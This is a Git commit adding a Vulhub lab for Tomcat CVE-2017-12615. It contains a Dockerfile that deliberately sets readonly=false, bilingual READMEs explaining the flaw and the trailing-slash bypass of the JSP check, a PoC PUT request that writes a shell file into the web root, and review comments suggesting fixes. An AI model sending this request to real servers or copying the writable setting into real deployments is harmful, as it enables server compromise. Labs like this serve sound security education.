first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
BIN
tomcat/CVE-2017-12615/01.png
Normal file
Binary file not shown.
Size: 17 KiB
8
tomcat/CVE-2017-12615/Dockerfile
Normal file
@@ -0,0 +1,8 @@
FROM vulhub/tomcat:8.5.19

LABEL maintainer="phithon <root@leavesongs.com>"

RUN cd /usr/local/tomcat/conf \
&& LINE=$(nl -ba web.xml | grep '<load-on-startup>1' | awk '{print $1}') \
&& ADDON="<init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>" \
&& sed -i "$LINE i $ADDON" web.xml
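Review bot: the line-number lookup in the RUN step is fragile: `LINE=$(nl -ba web.xml | grep '<load-on-startup>1' | awk '{print $1}')` silently becomes empty or multi-valued if the base image's web.xml has zero or several matching lines, and `sed -i "$LINE i $ADDON" web.xml` then either errors out or inserts the readonly parameter into the wrong servlet block. Suggest shipping a prepared web.xml with COPY instead, or at least guarding the build with `test "$(printf '%s' "$LINE" | wc -w)" -eq 1` before the sed, so a changed base image fails the build loudly instead of producing a container that is not in the state the README describes.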
67
tomcat/CVE-2017-12615/README.md
Normal file
@@ -0,0 +1,67 @@
# Tomcat Arbitrary Write-file Vulnerability through PUT Method (CVE-2017-12615)

[中文版本(Chinese version)](README.zh-cn.md)

Tomcat version: 8.5.19

## Environment Setup

```
docker compose build
docker compose up -d
```

After successfully running the commands above, you will see the example page of Tomcat through visiting the site `http://your-ip:8080`.

## Rationale

Reference links:

- http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html
- https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5
- https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e

Tomcat sets up the write permission(readonly=false), which leads to the result that we can write files into the server.

```
<servlet>
<servlet-name>default</servlet-name>
<servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>0</param-value>
</init-param>
<init-param>
<param-name>listings</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
```

Although Tomcat checks the file suffix to some extent(can't write jsp directly), we can still bypass the limitation through some file system features(such as using `/` in Linux).

## POC

Send the following packets directly and then the shell will be written into the Web root directory.

```
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell
```

As follows:


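Review bot: the Rationale section explains that `readonly=false` makes the DefaultServlet writable but never states the remediation, which a lab write-up should carry next to the reproduction: leave the DefaultServlet `readonly` init-param at its default of `true` (this Dockerfile injects `false` on purpose) and reject PUT/DELETE at the front end. Minor prose fixes in the same hunk: `write permission(readonly=false)` and `some extent(can't write jsp directly)` are missing a space before the parenthesis, "Send the following packets" should read "request" (it is a single HTTP request), and the title reads more naturally as "Arbitrary File Write Vulnerability".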
65
tomcat/CVE-2017-12615/README.zh-cn.md
Normal file
@@ -0,0 +1,65 @@
# Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)

Tomcat版本:8.5.19

## 环境搭建

```
docker compose build
docker compose up -d
```

运行完成后访问`http://your-ip:8080`即可看到Tomcat的Example页面。

## 漏洞原理

参考:

- http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html
- https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5
- https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e

漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件:

```
<servlet>
<servlet-name>default</servlet-name>
<servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>0</param-value>
</init-param>
<init-param>
<param-name>listings</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
```

虽然Tomcat对文件后缀有一定检测(不能直接写jsp),但我们使用一些文件系统的特性(如Linux下可用`/`)来绕过了限制。

## 漏洞复现

直接发送以下数据包即可在Web根目录写入shell:

```
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell
```

如下:


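Review bot: the Chinese README has no link back to the English version, while README.md carries `[中文版本(Chinese version)](README.zh-cn.md)`; add a matching `[English version](README.md)` line under the title so the two pages cross-reference each other. The same gap as in README.md applies here: 漏洞原理 explains that `readonly=false` is what enables the write, but does not say that the fix is to keep the DefaultServlet `readonly` parameter at its default of `true` and to block PUT/DELETE in front of Tomcat.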
6
tomcat/CVE-2017-12615/docker-compose.yml
Normal file
@@ -0,0 +1,6 @@
version: '2'
services:
tomcat:
build: .
ports:
- "8080:8080"
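Review bot: `- "8080:8080"` publishes a Tomcat that is deliberately writable by anyone on every host interface; for a lab image, bind to loopback with `- "127.0.0.1:8080:8080"` and let the user widen it on purpose. Also, `version: '2'` is obsolete with the `docker compose` v2 CLI that the README tells users to run; it is ignored with a warning and can be dropped.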